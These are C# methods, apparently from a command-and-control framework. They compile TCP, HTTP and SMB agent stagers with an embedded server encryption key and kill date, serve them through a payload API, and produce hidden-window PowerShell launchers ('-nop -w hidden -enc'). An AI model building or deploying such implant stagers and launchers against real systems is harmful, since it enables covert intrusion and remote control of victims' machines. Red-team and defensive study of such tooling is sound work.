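/// <summary>
/// Builds the TCP agent stager: clones the stager source into a fresh temporary directory,
/// patches in the bind address/port, the kill date and the crypto key, then compiles it.
/// </summary>
/// <param name="request">Output type, target framework and kill date for the build.</param>
/// <returns>The bytes returned by <c>Compiler.Compile</c> for the generated source.</returns>
/// <exception cref="ArgumentNullException"><paramref name="request"/> is null.</exception>
public byte[] GenerateStager(TcpPayloadRequest request)
{
    if (request is null)
    {
        throw new ArgumentNullException(nameof(request));
    }

    // The same framework selection feeds every reference entry, so resolve it once.
    var dotNetVersion = (Compiler.DotNetVersion)request.TargetFramework;
    var referenceSubdir = request.TargetFramework == TargetFramework.Net35 ? "net35" : "net40";

    TempPath = CreateTempDirectory();
    try
    {
        var compilerRequest = new Compiler.CompilationRequest
        {
            AssemblyName = "AgentStager",
            OutputKind = (OutputKind)request.OutputType,
            Platform = Platform.AnyCpu,
            ReferenceDirectory = Path.Combine(ReferencesDirectory, referenceSubdir),
            TargetDotNetVersion = dotNetVersion,
            SourceDirectory = TempPath,
            References = new List<Compiler.Reference>
            {
                Reference("mscorlib.dll"),
                Reference("System.dll"),
                Reference("System.Core.dll"),
                Reference("System.XML.dll"),
                Reference("System.Runtime.Serialization.dll"),
            },
        };

        CloneAgentStagerSourceCode(Listener.Type, TempPath);
        InsertBindAddress();
        InsertBindPort();
        InsertKillDate(request.KillDate);

        // The server's encryption key is written into the stager source, so the compiled
        // artifact carries key material and must be stored and transmitted as a secret.
        InsertCryptoKey(Convert.ToBase64String(Program.ServerController.CryptoController.EncryptionKey));

        return Compiler.Compile(compilerRequest);
    }
    finally
    {
        // Clean up even when cloning or compilation throws; previously the temp directory leaked.
        RemoveTempDirectory(TempPath);
    }

    // Every reference targets the requested framework and is enabled.
    Compiler.Reference Reference(string file) =>
        new Compiler.Reference { File = file, Framework = dotNetVersion, Enabled = true };
}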
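/// <summary>
/// Builds a TCP agent stager for the supplied request and returns it base64-encoded.
/// </summary>
/// <param name="request">The build parameters, bound from the JSON request body.</param>
/// <returns>
/// 200 with the base64 payload, or 400 when the body is missing or the build produced no bytes.
/// </returns>
public IActionResult GenerateTcpStager([FromBody] TcpPayloadRequest request)
{
    // A missing or unbindable body arrives as null; reject it here instead of
    // dereferencing it inside GenerateTcpAgent.
    if (request is null)
    {
        return BadRequest();
    }

    // NOTE(review): the stager produced here has the server encryption key inserted into it
    // (see the TCP controller's GenerateStager), so this action must sit behind the same
    // authentication as the rest of the API — confirm the class-level attributes.
    var payload = Controllers.PayloadControllerBase.GenerateTcpAgent(request);

    if (payload is null || payload.Length == 0)
    {
        return BadRequest();
    }

    return Ok(Convert.ToBase64String(payload));
}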
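/// <summary>
/// Asks the server to build a TCP stager and returns the decoded bytes.
/// </summary>
/// <param name="req">The build parameters, serialised as the JSON request body.</param>
/// <returns>
/// The decoded payload, or an empty array when the server did not answer 200 OK with a body.
/// </returns>
/// <exception cref="FormatException">The response body is not valid base64.</exception>
public static async Task<byte[]> GenerateTcpStager(TcpPayloadRequest req)
{
    var apiRequest = new RestRequest("/api/Payload/tcp", Method.POST);
    apiRequest.AddParameter("application/json", JsonConvert.SerializeObject(req), ParameterType.RequestBody);

    var apiResponse = await REST.Client.ExecuteAsync(apiRequest);

    // Guard the body as well as the status code: a null or empty Content would otherwise
    // throw from Replace/FromBase64String instead of signalling "no payload".
    if (apiResponse.StatusCode != System.Net.HttpStatusCode.OK || string.IsNullOrEmpty(apiResponse.Content))
    {
        return Array.Empty<byte>();
    }

    // The server may wrap the base64 string in quotes; strip them before decoding.
    var base64 = apiResponse.Content.Replace("\"", "");
    return Convert.FromBase64String(base64);
}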
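/// <summary>
/// Command handler: builds a payload for the selected listener and format through the
/// payload API, shows a progress window while the build runs, then either displays the
/// PowerShell launcher or prompts to save the binary. Closes the owning view when done.
/// </summary>
/// <param name="obj">Command parameter; not used.</param>
private async void OnGeneratePayload(object obj)
{
    // async void is tolerated only because this is a command handler nobody can await.
    if (string.IsNullOrEmpty(SelectedListener))
    {
        return;
    }

    var listenerName = SelectedListener.Split(":")[0].TrimEnd();
    var listener = Listeners.FirstOrDefault(l =>
        l.ListenerName.Equals(listenerName, StringComparison.OrdinalIgnoreCase));

    // FirstOrDefault yields null when the selection no longer matches a listener;
    // previously this fell through to a NullReferenceException on listener.ListenerType.
    if (listener is null)
    {
        return;
    }

    var req = new PayloadRequest();
    switch (listener.ListenerType)
    {
        case ListenerType.HTTP:
            req = new HttpPayloadRequest
            {
                ListenerGuid = listener.ListenerGuid,
                SleepInterval = SleepInterval,
                SleepJitter = SleepJitter,
            };
            break;
        case ListenerType.TCP:
            req = new TcpPayloadRequest { ListenerGuid = listener.ListenerGuid };
            break;
        case ListenerType.SMB:
            req = new SmbPayloadRequest { ListenerGuid = listener.ListenerGuid };
            break;
        default:
            // Unknown listener types keep the bare PayloadRequest, as before.
            break;
    }

    req.KillDate = KillDate;

    // PowerShell output is built on top of an EXE, so both formats request an EXE build.
    if (SelectedFormat.Equals("PowerShell", StringComparison.OrdinalIgnoreCase)
        || SelectedFormat.Contains("EXE", StringComparison.OrdinalIgnoreCase))
    {
        req.OutputType = OutputType.Exe;
    }

    var progress = new Window
    {
        Height = 100,
        Width = 360,
        WindowStartupLocation = WindowStartupLocation.CenterOwner,
        Content = new ProgressBarView
        {
            DataContext = new ProgressBarViewModel { Label = "Building..." },
        },
    };
    progress.Show();

    var payload = Array.Empty<byte>();
    try
    {
        switch (listener.ListenerType)
        {
            case ListenerType.HTTP:
                payload = await PayloadAPI.GenerateHttpStager(req as HttpPayloadRequest);
                break;
            case ListenerType.TCP:
                payload = await PayloadAPI.GenerateTcpStager(req as TcpPayloadRequest);
                break;
            case ListenerType.SMB:
                payload = await PayloadAPI.GenerateSmbStager(req as SmbPayloadRequest);
                break;
        }
    }
    finally
    {
        // Previously an exception from the API call left the progress window open.
        progress.Close();
    }

    if (payload != null && payload.Length > 0)
    {
        if (SelectedFormat.Equals("PowerShell", StringComparison.OrdinalIgnoreCase))
        {
            ShowPowerShellLauncher(payload);
        }
        else
        {
            SaveBinary(payload);
        }
    }

    View.Close();

    // Shows the launcher window for a PowerShell-format payload.
    void ShowPowerShellLauncher(byte[] bytes)
    {
        var launcher = PowerShellLauncher.GenerateLauncher(bytes);
        var encLauncher = Convert.ToBase64String(Encoding.Unicode.GetBytes(launcher));
        var viewModel = new PowerShellPayloadViewModel
        {
            Launcher = $"powershell.exe -nop -w hidden -c \"{launcher}\"",
            EncLauncher = $@"powershell.exe -nop -w hidden -enc {encLauncher}",
        };
        new PowerShellPayloadView { DataContext = viewModel }.Show();
    }

    // Prompts for a destination matching the selected format and writes the bytes there.
    void SaveBinary(byte[] bytes)
    {
        var save = new SaveFileDialog();
        if (SelectedFormat.Contains("EXE", StringComparison.OrdinalIgnoreCase))
        {
            save.Filter = "EXE (*.exe)|*.exe";
        }
        else if (SelectedFormat.Contains("DLL", StringComparison.OrdinalIgnoreCase))
        {
            save.Filter = "DLL (*.dll)|*.dll";
        }

        // ShowDialog returns bool?; the previous (bool) cast threw when it was null.
        if (save.ShowDialog() == true)
        {
            File.WriteAllBytes(save.FileName, bytes);
        }
    }
}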
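/// <summary>
/// Resolves the listener named by <paramref name="request"/> and builds a TCP stager bound to it.
/// </summary>
/// <param name="request">Identifies the listener and carries the stager build options.</param>
/// <returns>The compiled stager bytes from <see cref="TcpPayloadController.GenerateStager"/>.</returns>
/// <exception cref="ArgumentNullException"><paramref name="request"/> is null.</exception>
/// <exception cref="InvalidOperationException">
/// The listener GUID does not resolve to a <see cref="ListenerTcp"/>.
/// </exception>
public static byte[] GenerateTcpAgent(TcpPayloadRequest request)
{
    if (request is null)
    {
        throw new ArgumentNullException(nameof(request));
    }

    // `as ListenerTcp` silently produced null for an unknown GUID or a non-TCP listener,
    // which only surfaced later as a NullReferenceException inside the controller.
    if (!(GetListener(request.ListenerGuid) is ListenerTcp tcpListener))
    {
        throw new InvalidOperationException($"Listener {request.ListenerGuid} is not a TCP listener.");
    }

    return new TcpPayloadController(tcpListener).GenerateStager(request);
}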